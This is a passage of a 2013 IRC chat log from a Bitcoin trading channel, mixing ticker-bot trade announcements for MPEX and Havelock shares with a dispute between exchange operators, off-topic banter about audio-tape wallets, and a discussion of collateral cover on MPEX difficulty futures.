wrong, or misleading, I'm going to post a follow up with the truth. If that bothers you, I'm sorry, but it has to be done. If you don't want to be called a liar, then don't say definitively that something is true when it is not. Jan 30 01:28:01 [MPEX] [S.MPOE] 2857 @ 0.00064716 = 1.8489 BTC [-] Jan 30 01:28:03 [MPEX] [S.MPOE] 293 @ 0.00064693 = 0.1896 BTC [-] Jan 30 01:28:04 [MPEX] [S.MPOE] 8650 @ 0.00064434 = 5.5735 BTC [-] Jan 30 01:28:09 Alright, so from now on when I ask any questions about your site which does some very unconvential things w/o any supportive documentation, i will create a new irc user Jan 30 01:28:16 so you dont have to hold it to your high standards Jan 30 01:28:25 and expectancy to be able to read your mind Jan 30 01:28:28 Ukto, put a withdrawal address and check the form that appears... Jan 30 01:28:28 and do everything you expect them to do Jan 30 01:28:28 Heh, how very upright of you. Jan 30 01:28:35 Namworld: yes, i see that now Jan 30 01:28:35 and take a screenshot again... Jan 30 01:28:48 Namworld: as I said, I was just ahving a discussion here on irc Jan 30 01:28:52 if you for example or someone else had said Jan 30 01:29:01 "hey, actually it should cancel"\ Jan 30 01:29:08 "should show a max withdraw" Jan 30 01:29:09 or something Jan 30 01:29:15 i would have said "oh, let me check" Jan 30 01:29:26 just like when you answered my question about outstanding shares Jan 30 01:29:27 this is a public chan, just as public as the forums. if you want the privacy (and to spread the FUD privately) you can pm anyone you want about it. Jan 30 01:29:27 and how it worked Jan 30 01:29:59 burnside: you should post a live irc log on btct Jan 30 01:30:00 :) Jan 30 01:30:18 i will get you a list of all bitcoin related channels Jan 30 01:30:26 so you can monitor them all Jan 30 01:30:32 and even the ones on all the other networks Jan 30 01:30:44 so you can critisize any and all users Jan 30 01:30:49 that make a simple misudnerstanding of your site Jan 30 01:31:03 you admitted it yourself, youy hold me in higher regards and expectancies Jan 30 01:31:09 but I am no different then another btct user Jan 30 01:31:22 i look for the same documentation to yoru custom stuff Jan 30 01:31:25 i use the same interface Jan 30 01:31:30 i get confused just as easily as others would Jan 30 01:31:56 as Namworld said, he had to spend nearly $40 to understnad your system Jan 30 01:31:57 There's no confusion in stating as fact something that is not true, nor possible. Jan 30 01:31:57 and how it worked Jan 30 01:32:05 i dont know whats possible Jan 30 01:32:07 where is it in the faq? Jan 30 01:32:18 as I said Jan 30 01:32:20 i put in the post Jan 30 01:32:24 I should have wrote "could" Jan 30 01:32:27 instead of "can" Jan 30 01:32:33 your nitpicking Jan 30 01:32:53 and over dramatizing something Jan 30 01:33:21 you wanna defend yourself, then defend yourself to the people that i outright lied to Jan 30 01:33:33 you dont have to go "WOH IS ME" to the whole world Jan 30 01:33:36 and seek attention Jan 30 01:35:22 [18:31] as Namworld said, he had to spend nearly $40 to understnad your system Jan 30 01:35:27 I never said that O.o Jan 30 01:35:58 I'd rather not end up with all this attention. But I can't leave other users confused based on posts of a competing exchange operator. You of all people should be able to wrap your brain around that. Jan 30 01:36:57 I think it was pigeons that said that he'd spent 2 BTC making trades to test Ukto's statements. Jan 30 01:38:02 ah Jan 30 01:38:11 might have been, will scroll back up Jan 30 01:38:19 Namworld: sorry if i misread that :) Jan 30 01:38:33 yeah, it was. [17:14] i just spent 2 btc on btc-bond to learn how this works Jan 30 02:04:28 this just in, IRC is srs bzns Jan 30 02:07:53 hey, totally off topic, a friend made some wallet with old audio tape, i found this awesome, so i share ;) Jan 30 02:08:06 http://www.imagebam.com/gallery/moq5ne52uqq4505whye4bycvb7oolwt8 Jan 30 02:11:23 looks like two iphone cases stuck together Jan 30 02:12:09 pretty cool though Jan 30 02:15:35 actually Jan 30 02:15:37 thts pretty neat Jan 30 02:15:40 very retro Jan 30 02:15:44 I bet they would sell like hotcakes Jan 30 02:15:59 wonder if hw would consider marketing em? :) Jan 30 02:16:09 i think teens would like em Jan 30 02:16:16 mid/late teens, mebbe early 20s Jan 30 02:16:33 I think you mean 'hipsters' Jan 30 02:16:41 yeah hehe Jan 30 02:16:51 esp. if you can "build your own" selecinting diff tapes, colors etc on the site Jan 30 02:17:24 the result of that would be a bunch of ugly wallets Jan 30 02:17:30 better to stick with the plan Jan 30 02:17:36 lol Jan 30 02:17:45 the tapes will all have to be bands that "nobody has heard about" Jan 30 02:18:04 duketogo: you think so? :/ Jan 30 02:18:12 I figured if they actually bought the tapes and had receipts Jan 30 02:18:19 and just destroyed them it was fair game Jan 30 02:18:24 rather than making fake dupes Jan 30 02:18:25 you can buy tapes? Jan 30 02:18:28 sure, ebay Jan 30 02:18:31 can buy in bulk Jan 30 02:18:44 resell the case to one party and the music rights to another Jan 30 02:19:01 kakobrekla: not sure end users can just split the rights like that tho :/ Jan 30 02:19:15 is not split Jan 30 02:19:54 I thought duketogo was talking about the hipsters desire to be original by listening to obscure shit Jan 30 02:20:05 maybe put the music in a usb stick and you sell with the wallet Jan 30 02:20:20 if its a specific band Jan 30 02:20:39 aye, the hipster will not want to be seen with a tape wallet featuring a band that had any kind of commercial success ;) Jan 30 02:21:04 preferrably put a small amount of explosives in there instead of a usb stick to incinerate the hipster Jan 30 02:21:14 and yes obv he want marketing em but the prob is the production Jan 30 02:21:24 he made this one by one Jan 30 02:21:37 the other problem of course is what a hipster needs a wallet for? Jan 30 02:22:01 put some paper wallet inside ? Jan 30 02:22:09 money? mom buys everythign Jan 30 02:22:30 i got one but i'm not a fking hipsters Jan 30 02:23:12 i got one too, if we are talking about moms. Jan 30 02:25:00 https://bitcointalk.org/index.php?topic=139763.0 Jan 30 02:25:02 [MPEX] [S.MPOE] 4321 @ 0.00064455 = 2.7851 BTC [+] Jan 30 02:25:03 [MPEX] [S.MPOE] 3579 @ 0.00064434 = 2.3061 BTC [-] Jan 30 02:25:35 fuckin genious. Jan 30 02:26:47 >>its also a good game choice I think as its not totally trivial to create a bot for it. Jan 30 02:26:54 well we shall see about that soon Jan 30 02:27:03 hehe Challenge Accepted Jan 30 02:28:03 fuck... can someone make me an uber competent bot? Jan 30 02:28:25 =P Jan 30 02:28:32 like one that makes you breakfast and gives head? Jan 30 02:29:06 http://trilema.com/2013/how-to-hedge-as-a-miner/ Jan 30 02:29:18 everyone that comprehends mining plz to read and comment Jan 30 02:30:07 13w/gh! Jan 30 02:30:11 yes plox Jan 30 02:31:16 what, bfl does 1 w/gh :D Jan 30 02:47:23 [MPEX] [S.DICE] 500 @ 0.0073845 = 3.6923 BTC [-] Jan 30 02:48:11 http://www.reddit.com/r/Bitcoin/comments/17j3y2/how_to_hedge_as_a_miner/ Jan 30 02:48:13 :P Jan 30 02:48:29 eee Jan 30 02:48:44 they wont get it. Jan 30 02:49:09 ;/ Jan 30 02:49:20 not even with drawrinks!? Jan 30 02:49:48 lets be suprised Jan 30 02:50:21 [MPEX] [S.MPOE] 3200 @ 0.00064667 = 2.0693 BTC [+] Jan 30 02:50:33 well wtf am i to do. Jan 30 02:50:45 bet on it. Jan 30 02:50:57 kakobrekla: http://www.reddit.com/r/BitcoinMining/comments/17j454/how_to_hedge_as_a_miner_xpost/ Jan 30 02:51:02 :P Jan 30 02:51:42 dunno. Jan 30 02:52:25 anyone got anything good to watch for reccomendation Jan 30 02:52:33 danke smickles Jan 30 02:52:38 kakobrekla try all about eve Jan 30 02:53:08 http://trilema.com/category/trilematograf/ or just go through that list Jan 30 02:53:09 140min Jan 30 02:53:16 really worth it? Jan 30 02:53:41 tinkerlinks, ftw Jan 30 02:53:42 srsly Jan 30 02:54:06 kakobrekla welll... i dunno really what you like Jan 30 02:54:07 [MPEX] [S.MPOE] 4321 @ 0.00064461 = 2.7854 BTC [-] Jan 30 02:54:09 [MPEX] [S.MPOE] 5271 @ 0.00064434 = 3.3963 BTC [-] Jan 30 02:54:10 [MPEX] [S.MPOE] 6900 @ 0.00064374 = 4.4418 BTC [-] Jan 30 02:54:11 [MPEX] [S.MPOE] 1850 @ 0.00063666 = 1.1778 BTC [-] Jan 30 02:54:13 [MPEX] [S.MPOE] 12058 @ 0.00063598 = 7.6686 BTC [-] Jan 30 02:54:22 dunno borrig stuff i think. Jan 30 02:54:32 bah i stay up to write docs for miners, ppl sell mpoe. THIS IS THE THANKS I GET! Jan 30 02:55:09 don't look at me, i just leveraged long Jan 30 02:55:51 I cooked, I cleaned, and I sewed, and I have a right to get-- Jan 30 02:56:43 is this a fill in the blank? Jan 30 02:56:47 ducked ? Jan 30 02:56:56 crunk? Jan 30 02:57:07 pluived ? Jan 30 02:57:29 no Jan 30 02:57:37 refactored? Jan 30 02:58:01 this just in, IRC is srs bzns Jan 30 02:58:02 loller. Jan 30 02:59:54 oh no Jan 30 03:00:07 smickles the answer is here http://www.youtube.com/watch?v=9zgXnSKgopY Jan 30 03:00:09 i might be shadow-banned on reddit? Jan 30 03:00:43 kakobrekla: linked to blocked content? Jan 30 03:00:46 smickles i saw your link earlier Jan 30 03:01:15 mircea_popescu: that's just it, direct links work, but check the /r/bitcoin page or the /r/bitcoin/new Jan 30 03:01:18 not there Jan 30 03:01:44 i guess you could replace -- with 'shit'. Jan 30 03:02:10 http://www.reddit.com/r/Bitcoin/new?sort=new Jan 30 03:02:11 or here Jan 30 03:03:50 smickles huh? Jan 30 03:04:39 [MPEX] [S.DICE] 1700 @ 0.00732036 = 12.4446 BTC [-] Jan 30 03:04:41 [MPEX] [S.DICE] 150 @ 0.007395 = 1.1093 BTC [+] Jan 30 03:05:24 might be blocked in 'murica, cuts a little close to home Jan 30 03:05:47 too bad Jan 30 03:08:41 im off. take it ezzy all **** BEGIN LOGGING AT Wed Jan 30 10:14:10 2013 Jan 30 10:17:34 !s.dice Jan 30 10:17:43 !ticker s.dice Jan 30 10:17:44 It's so strange that you don't remember any of your poetry. Jan 30 10:18:35 !ticker m s.dice Jan 30 10:18:37 [MPEX:S.DICE] 1D: 0.00711564 / 0.00735027 / 0.007395 (85447 shares, 628.06 BTC), 7D: 0.00085848 / 0.00547144 / 0.0075 (1181450 shares, 6,464.24 BTC), 30D: 0.00085848 / 0.00440993 / 0.0075 (9302204 shares, 41,022.10 BTC) Jan 30 10:18:50 I find it a bit strange that mpex dice shares haven't lost value while Havelock's are a bit down Jan 30 10:19:16 Bowjob yest they were trading .8 Jan 30 10:19:26 Yeah Jan 30 10:19:37 well... and the guy came by and bought more s.dice Jan 30 10:19:56 I'd imagine with dice shares would plummet now that the whale got 9k in 1 day. Jan 30 10:20:04 why ? Jan 30 10:20:19 The profits are down? Jan 30 10:20:39 Well, im still figuring out if dice is up or down, looks like the whale is still playing Jan 30 10:20:55 listen, most people with that sort of nonsense outlook aren't on mpex Jan 30 10:20:59 they can't afford the fee. Jan 30 10:21:17 right Jan 30 10:22:36 !ticker h sdice Jan 30 10:22:39 [HAVELOCK:SDICE] 1D: 0.69500000 / 0.7513125 / 0.78000000 (80 shares, 60.10499969 BTC), 7D: 0.44000000 / 0.64762229 / 0.81000000 (1311 shares, 849.03282861 BTC), 30D: 0.37000000 / 0.51008583 / 0.81000000 (5482 shares, 2796.29051793 BTC) Jan 30 10:23:36 was up cause of lack of asks, prolly relaxed a little once owner bought a little more s.dice and put it on offer Jan 30 10:24:02 bowjob: s.dice is practically brand new and is just getting going - its big earning days are still ahead of us. Variances like a 9k loss to a whale are meaningless if you're in for the long term. Jan 30 10:26:42 actually i imagine the largest single factor affecting price is people's judgement of how likely a sale to a large player is. Jan 30 10:27:01 I do anticipate that - it makes sense Jan 30 10:27:09 stuff like the recent online casinos opening btc to the us is prolly more pressure than whether someone makles or loses 10k Jan 30 10:27:29 course, this is all speculation about what people may be speculating about lol. Jan 30 10:35:53 [MPEX] [S.MPOE] 10850 @ 0.00065466 = 7.1031 BTC [-] Jan 30 10:35:54 [MPEX] [S.MPOE] 4321 @ 0.00064931 = 2.8057 BTC [-] Jan 30 10:35:54 [MPEX] [S.MPOE] 66 @ 0.00064918 = 0.0428 BTC [-] Jan 30 10:35:55 [MPEX] [S.MPOE] 13800 @ 0.0006485 = 8.9493 BTC [-] Jan 30 10:53:38 [MPEX] [S.MPOE] 4321 @ 0.0006456 = 2.7896 BTC [-] Jan 30 10:53:39 [MPEX] [S.MPOE] 11200 @ 0.00064528 = 7.2271 BTC [-] Jan 30 10:53:40 [MPEX] [S.MPOE] 1735 @ 0.00064423 = 1.1177 BTC [-] Jan 30 11:01:11 [MPEX] [S.MPOE] 4321 @ 0.00064457 = 2.7852 BTC [+] Jan 30 11:01:12 [MPEX] [S.MPOE] 3725 @ 0.00064423 = 2.3998 BTC [-] Jan 30 11:11:47 [MPEX] [S.MPOE] 14500 @ 0.00064423 = 9.3413 BTC [-] Jan 30 11:40:18 [MPEX] [S.MPOE] 3540 @ 0.00064423 = 2.2806 BTC [-] Jan 30 11:40:19 [MPEX] [S.MPOE] 6597 @ 0.00064187 = 4.2344 BTC [-] Jan 30 11:40:48 Graet would you be so kind to link this somewhere http://trilema.com/2013/how-to-hedge-as-a-miner/ ? Jan 30 11:53:04 i'll read it laterm kids dinner time mircea_popescu Jan 30 11:59:13 [MPEX] [S.MPOE] 4400 @ 0.00064187 = 2.8242 BTC [-] Jan 30 12:09:32 [MPEX] [S.DICE] 712 @ 0.00734477 = 5.2295 BTC [+] Jan 30 12:16:53 [MPEX] [S.MPOE] 24 @ 0.00064187 = 0.0154 BTC [-] Jan 30 12:16:54 [MPEX] [S.MPOE] 3036 @ 0.00064169 = 1.9482 BTC [-] Jan 30 12:21:11 [MPEX] [S.MPOE] 4321 @ 0.00064744 = 2.7976 BTC [+] Jan 30 12:21:13 [MPEX] [S.MPOE] 9163 @ 0.00064755 = 5.9335 BTC [+] Jan 30 12:21:14 [MPEX] [S.MPOE] 11516 @ 0.00064855 = 7.4687 BTC [+] Jan 30 12:22:22 [MPEX] [S.MPOE] 4321 @ 0.0006483 = 2.8013 BTC [-] Jan 30 12:22:24 [MPEX] [S.MPOE] 934 @ 0.00064855 = 0.6057 BTC [+] Jan 30 12:22:25 [MPEX] [S.MPOE] 10645 @ 0.00065454 = 6.9676 BTC [+] Jan 30 12:35:46 [MPEX] [S.DICE] 450 @ 0.00730215 = 3.286 BTC [-] Jan 30 12:39:30 [MPEX] [S.MPOE] 4321 @ 0.00064199 = 2.774 BTC [-] Jan 30 12:39:31 [MPEX] [S.MPOE] 11879 @ 0.00064169 = 7.6226 BTC [-] Jan 30 13:07:11 [MPEX] [S.MPOE] 950 @ 0.00064636 = 0.614 BTC [+] Jan 30 13:07:13 [MPEX] [S.MPOE] 3850 @ 0.00064199 = 2.4717 BTC [-] Jan 30 13:21:40 [MPEX] [S.MPOE] 4321 @ 0.00065438 = 2.8276 BTC [+] Jan 30 13:21:41 [MPEX] [S.MPOE] 11479 @ 0.00065454 = 7.5135 BTC [+] Jan 30 13:35:43 [MPEX] [S.MPOE] 4321 @ 0.0006543 = 2.8272 BTC [-] Jan 30 13:35:45 [MPEX] [S.MPOE] 15179 @ 0.00065454 = 9.9353 BTC [+] Jan 30 13:45:21 https://bitcointalk.org/index.php?topic=139649.0 Jan 30 13:45:31 http://glados.cc/gold/ Jan 30 13:45:32 legit Jan 30 13:47:34 hi mircea_popescu, got a question about x.idiffs Jan 30 13:47:47 how do i know how much is the cover? Jan 30 13:48:12 when i buy some and difficulty rises, when they'll go *poof*? Jan 30 13:49:11 i showed that xdiff thingie to a guy with ~300ghash Jan 30 13:49:17 said he dont like insurances. Jan 30 13:49:46 nobody likes it, cause of above uncertainty Jan 30 13:50:05 [BTCTC] [GSDPT] 2000 @ 0.0075 = 15 BTC [+] Jan 30 13:50:34 practically every time you do MKFUT, collateral changes, not even saying anything about next quarters Jan 30 13:51:27 and buyers don't know what to expect, let's have practical example Jan 30 13:51:54 i have sold 20x x.idiff.mar to bugpowder fellow for 1.7711 BTC Jan 30 13:53:10 but the cover is actually less, am searching how much it was Jan 30 13:53:44 (if i inderstand idiffs correctly) Jan 30 13:54:28 [MPEX] [S.MPOE] 2753 @ 0.00065454 = 1.8019 BTC [+] Jan 30 13:54:30 [MPEX] [S.MPOE] 9104 @ 0.00065471 = 5.9605 BTC [+] Jan 30 13:54:31 [MPEX] [S.MPOE] 11170 @ 0.00066438 = 7.4211 BTC [+] Jan 30 13:54:32 [MPEX] [S.MPOE] 6950 @ 0.00066563 = 4.6261 BTC [+] Jan 30 13:54:34 [MPEX] [S.MPOE] 211 @ 0.00066576 = 0.1405 BTC [+] Jan 30 13:57:03 hmm, stat says IMMCover is 1.95470556 so it's a bit more... but still we don't know how much cover others provided Jan 30 13:58:44 would you buy future for 1.7BTC that's covered only up to 1.95 ? i doubt Jan 30 14:01:38 poor bugpowder, first that s.dice blunder, then this :DDD Jan 30 14:04:54 http://glados.cc/gold/ ,pffft. i'll wait for mithril bars Jan 30 14:05:05 ah is back online now Jan 30 14:05:14 was just givin an error before Jan 30 14:05:33 [MPEX] [S.MPOE] 471 @ 0.00064199 = 0.3024 BTC [-] Jan 30 14:05:35 [MPEX] [S.MPOE] 4585 @ 0.00064169 = 2.9421 BTC [-] Jan 30 14:05:35 [MPEX] [S.MPOE] 5600 @ 0.00064149 = 3.5923 BTC [-] Jan 30 14:05:36 [MPEX] [S.MPOE] 5844 @ 0.00064143 = 3.7485 BTC [-] Jan 30 14:35:12 [HAVELOCK] [SDICE] 10 @ 0.6120002 = 6.12 BTC [-] Jan 30 14:38:03 [HAVELOCK] [SDICE] 10 @ 0.612 = 6.12 BTC [-] Jan 30 14:40:05 [HAVELOCK] [SDICE] 4 @ 0.611 = 2.444 BTC [-] Jan 30 14:41:37 https://bitcointalk.org/index.php?topic=139931.0 Jan 30 14:50:46 based on the S.DICE betcount total on Jan 1 and current count I'm seeing a %14 increase in dividends. It's a simplistic calculation. Match what everyone else thinks or does someone have something more sound? Jan 30 14:55:53 if you have a look at the statistical analysis thread over at bitcointalk.org you can see that yesterday was a very bad day for s.dice Jan 30 14:56:11 ahh thanks Jan 30 14:56:46 https://bitcointalk.org/index.php?topic=80312.780 Jan 30 14:59:04 [HAVELOCK] [SDICE] 2 @ 0.5611 = 1.1222 BTC [-] Jan 30 14:59:58 but I guess if you consider regression to the mean satoshidice will be fine... Jan 30 15:03:33 [MPEX] [S.DICE] 1945 @ 0.00734477 = 14.2856 BTC [+] Jan 30 15:10:04 [MPEX] [S.MPOE] 10700 @ 0.00064685 = 6.9213 BTC [+] Jan 30 15:10:06 [MPEX] [S.MPOE] 4321 @ 0.00064175 = 2.773 BTC [-] Jan 30 15:10:07 [MPEX] [S.MPOE] 3579 @ 0.00064143 = 2.2957 BTC [-] Jan 30 15:25:44 clearly, dooglus is trying to out mircea_popescu as the mystery player, why else can I get "MPEX pay SDICE with SMPOE" out of the addresses listed in #782 Jan 30 15:28:33 [MPEX] [S.MPOE] 4321 @ 0.00066275 = 2.8637 BTC [+] Jan 30 15:28:35 [MPEX] [S.MPOE] 9150 @ 0.00066278 = 6.0644 BTC [+] Jan 30 15:39:30 [MPEX] [S.MPOE] 4321 @ 0.0006635 = 2.867 BTC [+] Jan 30 15:39:30 [MPEX] [S.MPOE] 15479 @ 0.00066381 = 10.2751 BTC [+] Jan 30 15:42:24 [MPEX] [S.MPOE] 2808 @ 0.00066287 = 1.8613 BTC [-] Jan 30 15:44:01 no, he's buying twelve pound solid bricks of crystal meth Jan 30 15:44:30 (see second recent trilema article) Jan 30 15:48:15 i'm pretty sure he's transporting them as 12" crystal meth dildos to get past customs. Jan 30 15:52:05 If nobody is to be routinely told exactly what a worthless, pointless accidental and undesired item they are then certainly nobody’s to be told they’re welcome to dream into one palm, piss in the other and see which feels warmer to the touch. Jan 30 15:52:16 and he calls someone snide. yeah. Jan 30 16:01:34 [BTCTC] [RSM] 100 @ 0.009 = 0.9 BTC [+] Jan 30 16:02:51 [BTCTC] [RSM] 11 @ 0.0091 = 0.1001 BTC [+] Jan 30 16:08:50 [MPEX] [S.MPOE] 2279 @ 0.00066381 = 1.5128 BTC [+] Jan 30 16:08:52 [MPEX] [S.MPOE] 14849 @ 0.00066576 = 9.8859 BTC [+] Jan 30 16:08:53 [MPEX] [S.MPOE] 1722 @ 0.00066577 = 1.1465 BTC [+] Jan 30 16:12:44 [MPEX] [S.MPOE] 6000 @ 0.00066577 = 3.9946 BTC [+] Jan 30 16:15:05 [MPEX] [S.MPOE] 7900 @ 0.00066577 = 5.2596 BTC [+] Jan 30 16:28:47 [MPEX] [S.MPOE] 1513 @ 0.00066287 = 1.0029 BTC [-] Jan 30 16:28:49 [MPEX] [S.MPOE] 16737 @ 0.00066282 = 11.0936 BTC [-] Jan 30 16:51:26 ;;ticker Jan 30 16:51:27 BTCUSD ticker | Best bid: 19.45001, Best ask: 19.52026, Bid-ask spread: 0.07025, Last trade: 19.42100, 24 hour volume: 53313.83367467, 24 hour low: 18.70000, 24 hour high: 19.80000, 24 hour vwap: 19.35731 Jan 30 16:51:39 ;;asks 29 Jan 30 16:51:41 There are currently 35300.69 bitcoins offered at or under 29.0 USD, worth 746476.392038 USD in total. Jan 30 16:51:42 ;;asks 29 Jan 30 16:51:44 There are currently 35300.69 bitcoins offered at or under 29.0 USD, worth 746476.392038 USD in total. Jan 30 16:51:45 ;;asks 20 Jan 30 16:51:47 There are currently 17178.888 bitcoins offered at or under 20.0 USD, worth 340747.595972 USD in total. Jan 30 16:52:01 ;;bids 19 Jan 30 16:52:04 There are currently 4392.8697 bitcoins demanded at or over 19.0 USD, worth 84249.722342 USD in total. Jan 30 17:03:02 [MPEX] [S.MPOE] 10300 @ 0.00066282 = 6.827 BTC [-] Jan 30 17:06:09 ;;bc,24 Jan 30 17:06:10 Error: "bc,24" is not a valid command. Jan 30 17:06:14 ;;bc,24hprc Jan 30 17:06:16 19.28 Jan 30 17:17:52 [MPEX] [S.MPOE] 5900 @ 0.00066328 = 3.9134 BTC [+] Jan 30 17:17:54 [MPEX] [S.MPOE] 4321 @ 0.00066542 = 2.8753 BTC [+] Jan 30 17:17:55 [MPEX] [S.MPOE] 12679 @ 0.00066577 = 8.4413 BTC [+] Jan 30 17:27:21 [MPEX] [S.DICE] 2223 @ 0.00730522 = 16.2395 BTC [-] Jan 30 17:35:27 [MPEX] [S.DICE] 550 @ 0.00734477 = 4.0396 BTC [+] Jan 30 17:40:43 [MPEX] [S.MPOE] 8550 @ 0.00066577 = 5.6923 BTC [+] Jan 30 17:58:04 [HAVELOCK] [SDICE] 1 @ 0.645 BTC [+] Jan 30 17:59:58 [MPEX] [S.MPOE] 149 @ 0.00066577 = 0.0992 BTC [+] Jan 30 17:59:59 [MPEX] [S.MPOE] 11651 @ 0.00066664 = 7.767 BTC [+] Jan 30 18:02:40 19.60 taken out Jan 30 18:03:06 knock 3 times and the door to $20 opens? Jan 30 18:08:10 yeah, rally right after i sold some...but i can't wait longer Jan 30 18:08:56 oh Bugpowder you weren;t around when i discussed the mpex idiffs ? Jan 30 18:08:57 no shame in selling at $19 Jan 30 18:09:12 don't think so Jan 30 18:09:18 I have sold some Jan 30 18:09:26 idiffs Jan 30 18:09:33 deposit req is harsh Jan 30 18:09:48 so, unless mircea corrects me, it comes out they are covered only up to 2.9x current difficulty Jan 30 18:10:17 so these i made only up to 9 M Jan 30 18:10:34 yeah Jan 30 18:10:48 i sold the same ones Jan 30 18:10:54 but before the last expiry Jan 30 18:11:00 so mine got up to 27 Jan 30 18:11:12 so basically you bought futures for 1.7BTC that are covered only up to 1.95 Jan 30 18:11:12 I've had a long discussion wiht mp about this Jan 30 18:11:20 i didn't Jan 30 18:11:31 I sold some Jan 30 18:11:36 a month ago Jan 30 18:11:39 the SAME ones Jan 30 18:11:45 okay. but overall i'm correct? Jan 30 18:11:45 but mine go up to 27 Jan 30 18:12:09 and when the 9 threshold is hit, the expiry is spread across both sets of sold futures Jan 30 18:12:16 but the cover averages over all idiff shares, no? Jan 30 18:12:22 yeah Jan 30 18:12:23 so i diluted it in fact Jan 30 18:12:30 yes thank you Jan 30 18:12:38 my exposure is reduced now Jan 30 18:12:49 there is no way to know Jan 30 18:13:09 what the actual distribution of 27 and 9s is Jan 30 18:13:12 yes, there is no way to know what the cover is. well, i got an idea how to fix it Jan 30 18:13:22 great Jan 30 18:13:26 CoinBr.IDiff will come to bitfunder soon ;D Jan 30 18:13:36 cool Jan 30 18:13:51 idiff is useful Jan 30 18:13:57 but needs some refinement Jan 30 18:14:04 and liquidity Jan 30 18:15:48 hmmm maybe I will make some Jan 30 18:16:59 [MPEX] [S.MPOE] 4321 @ 0.00066302 = 2.8649 BTC [-] Jan 30 18:17:01 [MPEX] [S.MPOE] 7146 @ 0.00066282 = 4.7365 BTC [-] Jan 30 18:17:52 [MPEX] [S.DICE] 242 @ 0.00734477 = 1.7774 BTC [+] Jan 30 18:19:13 [BTCTC] [COGNITIVE] 8 @ 0.3001 = 2.4008 BTC [-] Jan 30 18:19:15 [BTCTC] [COGNITIVE] 5 @ 0.3001 = 1.5005 BTC [-] Jan 30 18:19:16 [BTCTC] [COGNITIVE] 7 @ 0.3 = 2.1 BTC [-] Jan 30 18:25:08 [BTCTC] [B.YABMC] 4 @ 0.0238 = 0.0952 BTC [-] Jan 30 18:25:13 [BTCTC] [B.YABMC] 12 @ 0.0237 = 0.2844 BTC [-] Jan 30 18:27:04 I made some idiffs! Jan 30 18:27:06 buy buy buy! Jan 30 18:27:15 priced to MOVE Jan 30 18:33:36 [MPEX] [S.MPOE] 4321 @ 0.00066642 = 2.8796 BTC [+] Jan 30 18:33:38 [MPEX] [S.MPOE] 2979 @ 0.00066657 = 1.9857 BTC [+] Jan 30 18:34:41 [MPEX] [S.MPOE] 6576 @ 0.00066657 = 4.3834 BTC [+] Jan 30 18:39:01 [MPEX] [S.DICE] 300 @ 0.00734477 = 2.2034 BTC [+] Jan 30 18:45:17 [MPEX] [S.DICE] 400 @ 0.00734477 = 2.9379 BTC [+] Jan 30 18:49:04 [MPEX] [O.BTCUSD.C190T] 10 @ 0.21604376 = 2.1604 BTC [+] Jan 30 18:52:43 ahhh how goes it boys an' girls ? Jan 30 18:55:52 [MPEX] [S.DICE] 400 @ 0.00734477 = 2.9379 BTC [+] Jan 30 19:02:54 hi mircea Jan 30 19:03:04 heya Jan 30 19:03:12 i'm going to improve idiff futures ;) Jan 30 19:03:18 o ? Jan 30 19:15:18 said he dont like insurances. <<< heh. Jan 30 19:16:10 [MPEX] [S.DICE] 300 @ 0.00734477 = 2.2034 BTC [+] Jan 30 19:16:16 markedathome I seriously have played a grand total of maybe 3 btc on s.dice. Jan 30 19:16:32 ;;ticker Jan 30 19:16:33 BTCUSD ticker | Best bid: 19.42769, Best ask: 19.54999, Bid-ask spread: 0.12230, Last trade: 19.42769, 24 hour volume: 50009.52094866, 24 hour low: 18.70000, 24 hour high: 19.63999, 24 hour vwap: 19.35837 Jan 30 19:16:48 ;;asks 20 Jan 30 19:16:51 There are currently 14954.611 bitcoins offered at or under 20.0 USD, worth 297782.475441 USD in total. Jan 30 19:17:21 mircea_popescu: i just thought it was funny that I could get those words out of the way the addresses were arranged. Jan 30 19:17:36 ;;bids Jan 30 19:17:37 (bids [--under] ) -- Calculate the amount of bitcoin demanded at or over . If '--under' option is given, find coins or at or under . Jan 30 19:17:45 ;;bids 19 Jan 30 19:17:48 There are currently 5527.276 bitcoins demanded at or over 19.0 USD, worth 105766.29329 USD in total. Jan 30 19:18:11 markedathome i guess by now pretty much everything's somewhat connected to mpex Jan 30 19:18:52 doesn't really matter, you could make any sequence of chars out of something if you look hard enough. took me a while to get smpoe Jan 30 19:19:49 o o i see lol Jan 30 19:20:04 there's this kaballah thing where they look for the nth letters sort of thing Jan 30 19:20:47 jurov the collateral is 2.9x the current diff per set, so march are currently about .1 ad june about .3 Jan 30 19:21:32 yes, but the buyer doesn't know where it is exactly. especially if previous quarters are mixed in Jan 30 19:22:12 buyer knows it's not going to be less than 2.9x whatever quarter he buys in Jan 30 19:22:29 it can be anywhere from (lowest difficulty in this quarter)*2.9 and more Jan 30 19:22:35 yes, but not less. Jan 30 19:22:52 [MPEX] [S.DICE] 400 @ 0.00734477 = 2.9379 BTC [+] Jan 30 19:27:10 sooo... what else is new ? Jan 30 19:28:08 we'll see how it goes after we open it. just that i think that buying future at 0.075 , while expected cover may be 0.0095 or maybe more isn't so attractive Jan 30 19:28:17 *0.095 Jan 30 19:29:11 why do you have to buy it at .075 ? Jan 30 19:29:18 [MPEX] [S.DICE] 500 @ 0.00731818 = 3.6591 BTC [-] Jan 30 19:30:02 it's lowest price offered to date. and seems nobody will sell it for less. Jan 30 19:30:47 well sure but best bid is like 4mn Jan 30 19:31:29 where? Jan 30 19:31:40 for mar. Jan 30 19:32:00 and for that matter i dunno if i'd buy at 7.5mn. what, diff doubles in the next six weeks ? Jan 30 19:32:02 i dun see it. Jan 30 19:32:20 well, remains to be seen if it actually trades at such price Jan 30 19:34:17 i think like 20 sold or something, but that's really nothing. Jan 30 19:34:39 yes, i experimentally sold 20 at 0.89 Jan 30 19:34:48 *0.089 Jan 30 19:34:50 i'd imagine at a bare minimum there should be 50% coverage which would put the volume in the 100k range per month or somrthing Jan 30 19:42:23 [MPEX] [S.MPOE] 31595 @ 0.00066657 = 21.0603 BTC [+] Jan 30 19:42:25 [MPEX] [S.MPOE] 5899 @ 0.00066664 = 3.9325 BTC [+] Jan 30 19:42:26 [MPEX] [S.MPOE] 370 @ 0.00066731 = 0.2469 BTC [+] Jan 30 19:42:26 [MPEX] [S.MPOE] 3200 @ 0.00066849 = 2.1392 BTC [+] Jan 30 19:42:28 [MPEX] [S.MPOE] 2874 @ 0.00066915 = 1.9231 BTC [+] Jan 30 19:43:23 ;;ticker Jan 30 19:43:25 BTCUSD ticker | Best bid: 19.46042, Best ask: 19.60448, Bid-ask spread: 0.14406, Last trade: 19.46042, 24 hour volume: 49860.53894881, 24 hour low: 18.70000, 24 hour high: 19.63999, 24 hour vwap: 19.35926 Jan 30 19:43:26 so what's new, anyway ? Jan 30 